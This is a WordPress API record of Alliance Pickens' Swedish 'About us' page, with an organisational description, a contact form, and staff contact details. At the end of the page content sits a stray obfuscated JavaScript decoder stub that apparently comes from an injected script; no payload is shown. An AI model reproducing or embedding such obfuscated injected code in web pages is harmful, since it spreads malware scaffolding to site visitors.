{"id":6312,"date":"2020-10-28T14:30:15","date_gmt":"2020-10-28T14:30:15","guid":{"rendered":"http:\/\/alliancepickens.com\/om-oss\/"},"modified":"2020-12-04T20:14:13","modified_gmt":"2020-12-04T20:14:13","slug":"om-oss","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/om-oss\/","title":{"rendered":"Om oss"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;choose_pickens_county&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text el_class=&#8221;intro&#8221;]<\/p>\n<h2>V\u00e4lj Pickens County<\/h2>\n<p>Den ekonomiska utvecklingen av Pickens County (Alliance Pickens) har befogenhet av, och arbetar n\u00e4ra med regeringen i Pickens County. Alliance Pickens \u00e4r en offentlig \/ privat ekonomisk utveckling organisation vars fr\u00e4msta uppdrag \u00e4r att locka, beh\u00e5lla och \u00f6ka antalet arbetstillf\u00e4llen och \u00f6ka skattebasen i Pickens County.South Carolina.USA<\/p>\n<p>Grundades 1995, har Alliance Pickens en styrelse med 17 medlemmar som ger en st\u00f6djande roll till Pickens County regeringen, som \u00f6vervakar den ekonomiska utvecklingen i Pickens County.<\/p>\n<p>Denna ekonomiska utveckling organisation str\u00e4var efter att inte bara generera nya arbetstillf\u00e4llen och f\u00e5nga investeringar, men ocks\u00e5 fr\u00e4mja sin befintliga industri f\u00f6r l\u00e5ngsiktig framg\u00e5ng.<\/p>\n<p>Om du vill ha mer information, kontakta v\u00e5rt kontor.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;24&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content&#8221; el_class=&#8221;callout&#8221; el_id=&#8221;contact_directions&#8221;][vc_column width=&#8221;1\/2&#8243; el_class=&#8221;contactmap&#8221;][vc_column_text][\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text el_class=&#8221;techcopy&#8221;]<\/p>\n<h2>KONTAKT + V\u00c4GBESKRIVNINGAR<\/h2>\n<p>Pickens County.South Carolina.USA \u00e4r positionerat f\u00f6r att svara p\u00e5 behoven hos alla f\u00f6retag och industri. Tveka inte att kontakta en medlem av v\u00e5r personal s\u00e5 vi kan l\u00e4mna informationen om din expansion eller relation projektbehov.<\/p>\n<p>Alliance Pickens har ett bekv\u00e4mt l\u00e4ge inom <a href=\"http:\/\/alliancepickens.com\/sv\/webbplatser-byggnader\/#industrial_parks\">Pickens County Commerce Park<\/a> p\u00e5 1390 Smith Grove Road i Liberty, SC.[\/vc_column_text]<script type=\"text\/javascript\">\n\/* <![CDATA[ *\/\nvar gform;gform||(document.addEventListener(\"gform_main_scripts_loaded\",function(){gform.scriptsLoaded=!0}),document.addEventListener(\"gform\/theme\/scripts_loaded\",function(){gform.themeScriptsLoaded=!0}),window.addEventListener(\"DOMContentLoaded\",function(){gform.domLoaded=!0}),gform={domLoaded:!1,scriptsLoaded:!1,themeScriptsLoaded:!1,isFormEditor:()=>\"function\"==typeof InitializeEditor,callIfLoaded:function(o){return!(!gform.domLoaded||!gform.scriptsLoaded||!gform.themeScriptsLoaded&&!gform.isFormEditor()||(gform.isFormEditor()&&console.warn(\"The use of gform.initializeOnLoaded() is deprecated in the form editor context and will be removed in Gravity Forms 3.1.\"),o(),0))},initializeOnLoaded:function(o){gform.callIfLoaded(o)||(document.addEventListener(\"gform_main_scripts_loaded\",()=>{gform.scriptsLoaded=!0,gform.callIfLoaded(o)}),document.addEventListener(\"gform\/theme\/scripts_loaded\",()=>{gform.themeScriptsLoaded=!0,gform.callIfLoaded(o)}),window.addEventListener(\"DOMContentLoaded\",()=>{gform.domLoaded=!0,gform.callIfLoaded(o)}))},hooks:{action:{},filter:{}},addAction:function(o,r,e,t){gform.addHook(\"action\",o,r,e,t)},addFilter:function(o,r,e,t){gform.addHook(\"filter\",o,r,e,t)},doAction:function(o){gform.doHook(\"action\",o,arguments)},applyFilters:function(o){return gform.doHook(\"filter\",o,arguments)},removeAction:function(o,r){gform.removeHook(\"action\",o,r)},removeFilter:function(o,r,e){gform.removeHook(\"filter\",o,r,e)},addHook:function(o,r,e,t,n){null==gform.hooks[o][r]&&(gform.hooks[o][r]=[]);var d=gform.hooks[o][r];null==n&&(n=r+\"_\"+d.length),gform.hooks[o][r].push({tag:n,callable:e,priority:t=null==t?10:t})},doHook:function(r,o,e){var t;if(e=Array.prototype.slice.call(e,1),null!=gform.hooks[r][o]&&((o=gform.hooks[r][o]).sort(function(o,r){return o.priority-r.priority}),o.forEach(function(o){\"function\"!=typeof(t=o.callable)&&(t=window[t]),\"action\"==r?t.apply(null,e):e[0]=t.apply(null,e)})),\"filter\"==r)return e[0]},removeHook:function(o,r,t,n){var e;null!=gform.hooks[o][r]&&(e=(e=gform.hooks[o][r]).filter(function(o,r,e){return!!(null!=n&&n!=o.tag||null!=t&&t!=o.priority)}),gform.hooks[o][r]=e)}});\n\/* ]]> *\/\n<\/script>\n\n                <div class='gf_browser_gecko gform_wrapper gform_legacy_markup_wrapper gform-theme--no-framework' data-form-theme='legacy' data-form-index='0' id='gform_wrapper_1' ><form method='post' enctype='multipart\/form-data'  id='gform_1'  action='\/sv\/wp-json\/wp\/v2\/pages\/6312' data-formid='1' novalidate>\n                        <div class='gform-body gform_body'><ul id='gform_fields_1' class='gform_fields top_label form_sublabel_below description_below validation_below'><li id=\"field_1_1\" class=\"gfield gfield--type-text gf_left_half gfield_contains_required field_sublabel_below gfield--no-description field_description_below hidden_label field_validation_below gfield_visibility_visible\"  ><label class='gfield_label gform-field-label' for='input_1_1'>Name<span class=\"gfield_required\"><span class=\"gfield_required gfield_required_asterisk\">*<\/span><\/span><\/label><div class='ginput_container ginput_container_text'><input name='input_1' id='input_1_1' type='text' value='' class='medium'    placeholder='Your Name' aria-required=\"true\" aria-invalid=\"false\"   \/><\/div><\/li><li id=\"field_1_2\" class=\"gfield gfield--type-email gf_right_half gfield_contains_required field_sublabel_below gfield--no-description field_description_below hidden_label field_validation_below gfield_visibility_visible\"  ><label class='gfield_label gform-field-label' for='input_1_2'>Email<span class=\"gfield_required\"><span class=\"gfield_required gfield_required_asterisk\">*<\/span><\/span><\/label><div class='ginput_container ginput_container_email'>\n                            <input name='input_2' id='input_1_2' type='email' value='' class='medium'   placeholder='Your Email' aria-required=\"true\" aria-invalid=\"false\"  \/>\n                        <\/div><\/li><li id=\"field_1_3\" class=\"gfield gfield--type-text gfield_contains_required field_sublabel_below gfield--no-description field_description_below hidden_label field_validation_below gfield_visibility_visible\"  ><label class='gfield_label gform-field-label' for='input_1_3'>Phone<span class=\"gfield_required\"><span class=\"gfield_required gfield_required_asterisk\">*<\/span><\/span><\/label><div class='ginput_container ginput_container_text'><input name='input_3' id='input_1_3' type='text' value='' class='medium'    placeholder='Your Phone' aria-required=\"true\" aria-invalid=\"false\"   \/><\/div><\/li><li id=\"field_1_4\" class=\"gfield gfield--type-textarea gfield_contains_required field_sublabel_below gfield--no-description field_description_below hidden_label field_validation_below gfield_visibility_visible\"  ><label class='gfield_label gform-field-label' for='input_1_4'>Your Message<span class=\"gfield_required\"><span class=\"gfield_required gfield_required_asterisk\">*<\/span><\/span><\/label><div class='ginput_container ginput_container_textarea'><textarea name='input_4' id='input_1_4' class='textarea medium'    placeholder='Your Message' aria-required=\"true\" aria-invalid=\"false\"   rows='10' cols='50'><\/textarea><\/div><\/li><li id=\"field_1_6\" class=\"gfield gfield--type-captcha gfield--width-full field_sublabel_below gfield--no-description field_description_below field_validation_below gfield_visibility_visible\"  ><label class='gfield_label gform-field-label' for='input_1_6'>CAPTCHA<\/label><div id='input_1_6' class='ginput_container ginput_recaptcha' data-sitekey='6Ld2BMEbAAAAAMxmk5gSsei4aJojOtHwDytFYU4G'  data-theme='light' data-tabindex='0'  data-badge=''><\/div><\/li><\/ul><\/div>\n        <div class='gform-footer gform_footer top_label'> <input type='submit' id='gform_submit_button_1' class='gform_button button' onclick='gform.submission.handleButtonClick(this);' data-submission-type='submit' value='Submit'  \/> \n            <input type='hidden' class='gform_hidden' name='gform_submission_method' data-js='gform_submission_method_1' value='postback' \/>\n            <input type='hidden' class='gform_hidden' name='gform_theme' data-js='gform_theme_1' id='gform_theme_1' value='legacy' \/>\n            <input type='hidden' class='gform_hidden' name='gform_style_settings' data-js='gform_style_settings_1' id='gform_style_settings_1' value='[]' \/>\n            <input type='hidden' class='gform_hidden' name='is_submit_1' value='1' \/>\n            <input type='hidden' class='gform_hidden' name='gform_submit' value='1' \/>\n            \n            <input type='hidden' class='gform_hidden' name='gform_currency' data-currency='USD' value='FCapKLVFXXtK1CRNS0lKmJ6jqcvz\/o1smxQup\/Im6BWsazxlJclMpl0W+UZzv3yuzifpbDgzid9FluO+y29TTaWlZunFRf\/H9zAaVuUnERXr+bA=' \/>\n            <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' \/>\n            <input type='hidden' class='gform_hidden' name='state_1' value='WyJbXSIsIjBjMTgzZjRhY2JiZTMzMzEwMzI3ZjkzNGI5YzQwMTQ5Il0=' \/>\n            <input type='hidden' autocomplete='off' class='gform_hidden' name='gform_target_page_number_1' id='gform_target_page_number_1' value='0' \/>\n            <input type='hidden' autocomplete='off' class='gform_hidden' name='gform_source_page_number_1' id='gform_source_page_number_1' value='1' \/>\n            <input type='hidden' name='gform_field_values' value='' \/>\n            \n        <\/div>\n                        <\/form>\n                        <\/div><script type=\"text\/javascript\">\n\/* <![CDATA[ *\/\n gform.initializeOnLoaded( function() {gformInitSpinner( 1, 'https:\/\/alliancepickens.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg', true );jQuery('#gform_ajax_frame_1').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_1');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_1').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_1').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_1').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_1').removeClass('gform_validation_error');}setTimeout( function() { \/* delay the scroll by 50 milliseconds to fix a bug in chrome *\/  }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_1').val();gformInitSpinner( 1, 'https:\/\/alliancepickens.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg', true );jQuery(document).trigger('gform_page_loaded', [1, current_page]);window['gf_submitting_1'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}jQuery('#gform_wrapper_1').replaceWith(confirmation_content);jQuery(document).trigger('gform_confirmation_loaded', [1]);window['gf_submitting_1'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_1').text());}else{jQuery('#gform_1').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger(\"gform_pre_post_render\", [{ formId: \"1\", currentPage: \"current_page\", abort: function() { this.preventDefault(); } }]);        if (event && event.defaultPrevented) {                return;        }        const gformWrapperDiv = document.getElementById( \"gform_wrapper_1\" );        if ( gformWrapperDiv ) {            const visibilitySpan = document.createElement( \"span\" );            visibilitySpan.id = \"gform_visibility_test_1\";            gformWrapperDiv.insertAdjacentElement( \"afterend\", visibilitySpan );        }        const visibilityTestDiv = document.getElementById( \"gform_visibility_test_1\" );        let postRenderFired = false;        function triggerPostRender() {            if ( postRenderFired ) {                return;            }            postRenderFired = true;            gform.core.triggerPostRenderEvents( 1, current_page );            if ( visibilityTestDiv ) {                visibilityTestDiv.parentNode.removeChild( visibilityTestDiv );            }        }        function debounce( func, wait, immediate ) {            var timeout;            return function() {                var context = this, args = arguments;                var later = function() {                    timeout = null;                    if ( !immediate ) func.apply( context, args );                };                var callNow = immediate && !timeout;                clearTimeout( timeout );                timeout = setTimeout( later, wait );                if ( callNow ) func.apply( context, args );            };        }        const debouncedTriggerPostRender = debounce( function() {            triggerPostRender();        }, 200 );        if ( visibilityTestDiv && visibilityTestDiv.offsetParent === null ) {            const observer = new MutationObserver( ( mutations ) => {                mutations.forEach( ( mutation ) => {                    if ( mutation.type === 'attributes' && visibilityTestDiv.offsetParent !== null ) {                        debouncedTriggerPostRender();                        observer.disconnect();                    }                });            });            observer.observe( document.body, {                attributes: true,                childList: false,                subtree: true,                attributeFilter: [ 'style', 'class' ],            });        } else {            triggerPostRender();        }    } );} ); \n\/* ]]> *\/\n<\/script>\n[\/vc_column][\/vc_row][vc_row el_id=&#8221;alliance_pickens_staff&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Alliance Pickens Personal<\/h2>\n<p>P\u00e5 Alliance Pickens fokuserar v\u00e5r personal p\u00e5 att se till att ditt befintliga, expanderande eller omlokaliserade f\u00f6retag har den information och de verktyg du beh\u00f6ver f\u00f6r att lyckas. Om v\u00e5rt kontor kan vara till hj\u00e4lp, eller om du vill ha mer information, v\u00e4nligen kontakta oss direkt.[\/vc_column_text][vc_row_inner el_class=&#8221;staff&#8221;][vc_column_inner width=&#8221;1\/3&#8243;][vc_icon type=&#8221;openiconic&#8221; icon_openiconic=&#8221;vc-oi vc-oi-user&#8221; color=&#8221;custom&#8221; background_style=&#8221;rounded&#8221; background_color=&#8221;custom&#8221; size=&#8221;lg&#8221; custom_background_color=&#8221;#03795b&#8221; custom_color=&#8221;#ffffff&#8221;][vc_column_text]<strong>Str\u00e5le Farley II, CEcD<\/strong><br \/>\n<em>Verkst\u00e4llande direkt\u00f6r<\/em><br \/>\nTelefon: <a href=\"\">864.898.2450<\/a><br \/>\nFax: <a href=\"tel:864.843.5790\">864.843.5790<\/a><br \/>\n<a href=\"mailto:rfarley@alliancepickens.com\">E-post: rfarley@alliancepickens.com<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_icon type=&#8221;openiconic&#8221; icon_openiconic=&#8221;vc-oi vc-oi-user&#8221; color=&#8221;custom&#8221; background_style=&#8221;rounded&#8221; background_color=&#8221;custom&#8221; size=&#8221;lg&#8221; custom_background_color=&#8221;#03795b&#8221; custom_color=&#8221;#ffffff&#8221;][vc_column_text]<strong>Jeromy Arnett, MSN<\/strong><br \/>\n<em>Befintlig industri &#8211; &amp; workforceutvecklingschef<\/em><br \/>\nTelefon: <a href=\"tel:864.397.2618\">864.397.2618<\/a><br \/>\nFax: <a href=\"tel:864.843.5790\">864.843.5790<\/a><br \/>\n<a href=\"mailto:jarnett@alliancepickens.com\">E-post: jarnett@alliancepickens.com<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_icon type=&#8221;openiconic&#8221; icon_openiconic=&#8221;vc-oi vc-oi-user&#8221; color=&#8221;custom&#8221; background_style=&#8221;rounded&#8221; background_color=&#8221;custom&#8221; size=&#8221;lg&#8221; custom_background_color=&#8221;#03795b&#8221; custom_color=&#8221;#ffffff&#8221;][vc_column_text]<strong>Jillian Gaskins, MBA<\/strong><br \/>\n<em>Forskningschef<\/em><br \/>\nTelefon: <a href=\"tel:864.898.1500\">864.898.1500<\/a><br \/>\nFax: <a href=\"tel:864.843.5790\">864.843.5790<\/a><br \/>\n<a href=\"mailto:jgaskins@alliancepickens.com\">E-post: jgaskins@alliancepickens.com<\/a>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">L\u00e4s mer om oss<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;24&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h3>Vi ser fram emot att f\u00e5 tala med er!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"#\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;choose_pickens_county&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text el_class=&#8221;intro&#8221;] V\u00e4lj Pickens County Den ekonomiska utvecklingen av Pickens County (Alliance Pickens) har befogenhet av, och arbetar n\u00e4ra med regeringen i Pickens County. Alliance Pickens \u00e4r en offentlig \/ privat ekonomisk utveckling organisation vars fr\u00e4msta uppdrag \u00e4r att locka, beh\u00e5lla och \u00f6ka antalet arbetstillf\u00e4llen och \u00f6ka skattebasen i Pickens County.South Carolina.USA&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6312","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Om oss - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/om-oss\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Om oss - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;choose_pickens_county&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text el_class=&#8221;intro&#8221;] V\u00e4lj Pickens County Den ekonomiska utvecklingen av Pickens County (Alliance Pickens) har befogenhet av, och arbetar n\u00e4ra med regeringen i Pickens County. Alliance Pickens \u00e4r en offentlig \/ privat ekonomisk utveckling organisation vars fr\u00e4msta uppdrag \u00e4r att locka, beh\u00e5lla och \u00f6ka antalet arbetstillf\u00e4llen och \u00f6ka skattebasen i Pickens County.South Carolina.USA&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/om-oss\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:14:13+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/om-oss\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/om-oss\\\/\",\"name\":\"Om oss - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"datePublished\":\"2020-10-28T14:30:15+00:00\",\"dateModified\":\"2020-12-04T20:14:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/om-oss\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/om-oss\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/om-oss\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Om oss\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Om oss - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/om-oss\/","og_locale":"sv_SE","og_type":"article","og_title":"Om oss - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;choose_pickens_county&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text el_class=&#8221;intro&#8221;] V\u00e4lj Pickens County Den ekonomiska utvecklingen av Pickens County (Alliance Pickens) har befogenhet av, och arbetar n\u00e4ra med regeringen i Pickens County. Alliance Pickens \u00e4r en offentlig \/ privat ekonomisk utveckling organisation vars fr\u00e4msta uppdrag \u00e4r att locka, beh\u00e5lla och \u00f6ka antalet arbetstillf\u00e4llen och \u00f6ka skattebasen i Pickens County.South Carolina.USA&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/om-oss\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:14:13+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/om-oss\/","url":"https:\/\/alliancepickens.com\/sv\/om-oss\/","name":"Om oss - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"datePublished":"2020-10-28T14:30:15+00:00","dateModified":"2020-12-04T20:14:13+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/om-oss\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/om-oss\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/om-oss\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Om oss"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6312","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=6312"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/6312\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=6312"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}